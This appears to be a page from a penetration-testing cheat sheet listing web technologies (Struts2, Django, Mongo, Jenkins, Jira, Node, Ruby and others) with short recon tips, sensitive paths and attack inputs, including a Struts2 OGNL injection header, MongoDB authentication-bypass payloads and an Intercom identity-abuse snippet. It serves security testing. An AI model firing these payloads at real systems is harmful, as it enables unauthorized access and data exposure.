caon.io
Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Back to homepage

Web Technologies

Auth0

Adobe AEM

Adobe Coldfusion

API

Apache

Apache Struts2

  • Endpoints with .action, .do, .go are all using struts2
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('Added Header',4*4)}.multipart/form-data

Artifactory Hacking

ASP.NET/IIS

trace.axd
any.aspx/trace.axd
WEB-INF/web.xml
con/
aux/
con.aspx
aux.aspx

Axis2

Cloudflare

Techniques to try to uncover web servers behind cloudflare:

Cloudflare R2 Buckets

check company r2.dev company.r2.dev

Cockpit CMS

Django

  • Try to POST in /admin, data will maybe leak
  • (SQLi in ?date)[https://github.com/vulhub/vulhub/tree/master/django/CVE-2022-34265]
  • Shodan dork to find DEBUG instances http.title:"DisallowedHost at /"

Flask

GraphQL

Google Forms

When misconfigured, it is possible to see analytics https://docs.google.com/forms/d/e//viewanalytics

Intercom

Interact with an email, log off, then run the command below with the same email. You will be able to see “Conversation history” if “Enforce Identity Validation” is not properly setup.

Intercom('boot', {
  email: '<MY_EMAIL_ADDRESS>'
});

Java RMI

Jetty

RCE by hotdeploy is enabled by default

JBoss

Jenkins

JENKINSIP/PROJECT//securityRealm/user/admin
JENKINSIP/jenkins/script

Jira

Check, unauth users should not have privileges
/rest/api/2/mypermissions
/rest/api/3/mypermissions

JSON Web Tokens

Meteor

Mongo

(Mongo IDs can lead to IDOR)[https://www.mickaelwalter.fr/idor-with-mongodb-understanding-objectid/]

username[$ne]=toto&password[$ne]=toto

{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$gt":""}, "password": {"$gt":""}

Next.JS

Look for _buildManifest.js in source coode, it exposes routes inside sortedPages.

console.log(__BUILD_MANIFEST.sortedPages)

Node/Express

  1. If the target is responding with X-Powered-By: Express and there is HTML in responses, it’s highly likely that NodeJs with server-side templating is being used
  2. Add layout in your wordlist of parameter discovery/fuzzing for GET query or POST body.
  3. If the arbitrary value of layout parameter added is resulting in 500 Internal Server Error with ENOENT: no such file or directory in body, You have hit the LFR.

https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/

Pentaho

Ruby

  • Add .json to the end of endpoints
  • Ruby uses server side javascript rendering which returns application/javascript in the response, this request can be embeded to a site to leak information
  • Add c=HTTPVERB in body to override requisitions
  • Force string interpolation https://buer.haus/2017/03/13 airbnb-ruby-on-rails-string-interpolation-led-to-remote-code-execution/

Salesforce

SAP

ServiceNow

  • kb_view_customer.do?sysparm_article=KB00XXXXX, unauth endpoint sometimes return data

Sharepoint

Spring

Symphony

Swagger

Telerik Web UI

Tomcat

  • Check for WEB-INF/web.xml

Traccar 5

WebDAV

WebLogic